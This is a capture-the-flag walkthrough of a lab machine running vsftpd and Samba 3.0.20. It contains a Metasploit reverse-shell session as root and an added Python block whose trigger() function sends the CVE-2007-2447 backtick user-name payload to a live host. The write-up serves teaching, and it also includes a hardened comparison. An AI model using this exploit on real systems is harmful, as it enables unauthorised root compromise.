This post is a writeup of the HackTheBox machine created by ch4p.
Nmap
Nmap result
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-27 10:46 EDT
Nmap scan report for 10.10.10.3
Host is up (0.29s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.15
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.41 seconds
FTP
Anonymous FTP login is allowed, but the directory listing is empty.
# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:vagrant): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
Searchsploit
Search for known vulnerabilities with Searchsploit
# searchsploit samba 3
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft Windows XP/2003 - Samba Share Resource Exhaustion (Denial of Service) | exploits/windows/dos/148.sh
Samba 1.9.19 - 'Password' Remote Buffer Overflow | exploits/linux/remote/20308.c
Samba 2.0.7 - SWAT Logfile Permissions | exploits/linux/local/20341.sh
Samba 2.0.7 - SWAT Logging Failure | exploits/unix/remote/20340.c
Samba 2.0.7 - SWAT Symlink (1) | exploits/linux/local/20338.c
Samba 2.0.7 - SWAT Symlink (2) | exploits/linux/local/20339.sh
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | exploits/linux/remote/16321.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation | exploits/linux/local/23674.txt
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | exploits/solaris_sparc/remote/16330.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | exploits/unix/remote/22470.c
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit) | exploits/linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow | exploits/unix/remote/22356.c
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | exploits/osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | exploits/multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | exploits/unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) | exploits/linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | exploits/linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | exploits/solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | exploits/linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | exploits/multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | exploits/linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit) | exploits/linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass | exploits/linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit) | exploits/linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal | exploits/linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit) | exploits/linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service | exploits/linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution | exploits/linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit) | exploits/linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution | exploits/linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow | exploits/linux/dos/27778.txt
Samba < 3.0.20 - Remote Heap Overflow | exploits/linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | exploits/linux_x86/dos/36741.py
Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service | exploits/windows/dos/2934.php
Sambar Server 4.3/4.4 Beta 3 - Search CGI | exploits/windows/remote/20223.txt
Sambar Server 5.1 - Script Source Disclosure | exploits/cgi/remote/21390.txt
Sambar Server 5.x - Information Disclosure | exploits/windows/remote/22434.txt
Sambar Server 6.0 - 'results.stm' POST Buffer Overflow | exploits/windows/dos/23664.py
Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access | exploits/windows/remote/24163.txt
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
The target is most likely Linux (Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel).
Nmap reports Samba 3.X - 4.X, so the candidates are the Samba 3.x entries in this list. I tried them and found that the 'Username map script' command execution exploit (exploits/unix/remote/16320.rb, CVE-2007-2447, Metasploit module exploit/multi/samba/usermap_script) works, so I use that.
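The following is an added example for this writeup, not code from the original post, from Samba or from Metasploit. It shows the primitive behind exploit/multi/samba/usermap_script: Samba 3.0.20 through 3.0.25rc3 substitutes the client-supplied user name into the command line configured with the smb.conf option 'username map script' and runs the result through /bin/sh, so a user name containing backticks executes commands as the smbd user, which is root. The block builds the same user name the Metasploit module sends, simulates the flawed substitution locally beside a hardened version, and includes a function that sends the payload to a real host with impacket. The smb.conf script path, the `SIM_SCRIPT` stand-in, and the impacket API usage in `trigger()` are assumptions for illustration and are not exercised by the local demo.

```python
"""
Added example: the 'username map script' command injection (CVE-2007-2447)
that exploit/multi/samba/usermap_script relies on, simulated locally.

  build_payload()  - the user name the Metasploit module sends
  vulnerable_map() - local simulation of the flawed substitution
  hardened_map()   - the same step with the user name kept out of the shell
  run_demo()       - runs both against a harmless script and reports
  trigger()        - sends the payload to a live host via impacket
                     (impacket API use is an assumption, not verified here)
"""
import os
import re
import shutil
import subprocess
import tempfile

# Shape of the smb.conf setting that makes the bug reachable; %u is replaced
# with the client-supplied user name. The script path is illustrative.
USERNAME_MAP_SCRIPT = "/etc/samba/scripts/mapusers.sh %u"

# Harmless stand-in used by run_demo() so the simulation runs anywhere.
SIM_SCRIPT = "true %u"


def build_payload(command: str) -> str:
    """User name as the Metasploit module builds it: the '/=' prefix and
    the backticks come from the module; nohup keeps the command alive after
    the map script's shell exits."""
    return "/=`nohup " + command + "`"


def vulnerable_map(username: str, script: str = USERNAME_MAP_SCRIPT) -> str:
    """Flawed behaviour: plain text substitution of %u, then /bin/sh -c.
    Backticks in the user name are evaluated by the shell.
    Returns the command line that was handed to the shell."""
    cmdline = script.replace("%u", username)
    subprocess.run(cmdline, shell=True, stdin=subprocess.DEVNULL,
                   capture_output=True, timeout=10)
    return cmdline


# Allow-list for user names: letters, digits, '.', '_', '@', '\\' and '-'.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9._@\\-]+")


def hardened_map(username: str, script: str = USERNAME_MAP_SCRIPT):
    """Fixed behaviour: reject names with shell metacharacters and pass the
    name as a single argv element, never through a shell.
    Returns the argv list that ran, or None if the name was rejected."""
    if not SAFE_USERNAME.fullmatch(username):
        return None
    argv = [username if tok == "%u" else tok for tok in script.split()]
    subprocess.run(argv, stdin=subprocess.DEVNULL, capture_output=True,
                   timeout=10)
    return argv


def run_demo() -> dict:
    """Inject 'touch <marker>' through both code paths and report which one
    actually executed it. The marker file is the proof of execution."""
    workdir = tempfile.mkdtemp(prefix="usermap-demo-")
    marker = os.path.join(workdir, "injected")
    payload = build_payload("touch " + marker)

    vulnerable_map(payload, SIM_SCRIPT)
    injected_via_vulnerable = os.path.exists(marker)
    if injected_via_vulnerable:
        os.remove(marker)

    rejected = hardened_map(payload, SIM_SCRIPT) is None
    injected_via_hardened = os.path.exists(marker)
    legit_argv = hardened_map("makis", SIM_SCRIPT)   # a normal name still maps
    shutil.rmtree(workdir, ignore_errors=True)

    return {
        "payload": payload,
        "vulnerable_executed_injection": injected_via_vulnerable,
        "hardened_rejected_payload": rejected,
        "hardened_executed_injection": injected_via_hardened,
        "hardened_legit_argv": legit_argv,
    }


def trigger(target: str, command: str, port: int = 445) -> None:
    """Send the payload to a live host. Assumes impacket is installed and that
    SMBConnection.login() forwards the raw user name to the server (assumption,
    not exercised here). The login is expected to fail: the command runs in the
    user-name mapping step, before any authentication succeeds."""
    from impacket.smbconnection import SMBConnection, SessionError
    conn = SMBConnection(target, target, sess_port=port)
    try:
        conn.login(build_payload(command), "")
    except SessionError:
        pass
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    for key, value in run_demo().items():
        print(f"{key}: {value}")
    if len(sys.argv) == 3:   # python3 usermap_demo.py <target> '<command>'
        trigger(sys.argv[1], sys.argv[2])
```

Run it without arguments to see the local simulation: the vulnerable path creates the marker file, the hardened path rejects the payload and still maps an ordinary name like makis. The same mechanism is why the Metasploit session below lands as root with no privilege escalation step.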
Metasploit
Start msfconsole
# msfconsole
[*] Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
=[ metasploit v5.0.53-dev ]
+ -- --=[ 1931 exploits - 1079 auxiliary - 331 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.14.15:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo fCTVcQOBqxECxNKZ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sh: line 3: Escape: command not found\r\nfCTVcQOBqxECxNKZ\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.3:55346) at 2019-10-27 11:25:59 -0400
pwd
/
id
uid=0(root) gid=0(root)
The shell is already root: the injected command runs inside smbd, which runs as root, so no privilege escalation step is needed. Both flags can be read directly.
ls /home/makis
user.txt
cat /home/makis/user.txt
ls /root
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
cat /root/root.txt
The first cat fails because the shell's working directory is still / (see pwd above); the full path works.
Summary
- Apply security patches early: this box falls to CVE-2007-2447, a 2007 bug in Samba 3.0.20 - 3.0.25rc3 that a version upgrade would have closed.
- A command injection in smbd is an immediate root compromise because smbd runs as root; no separate privilege escalation was needed.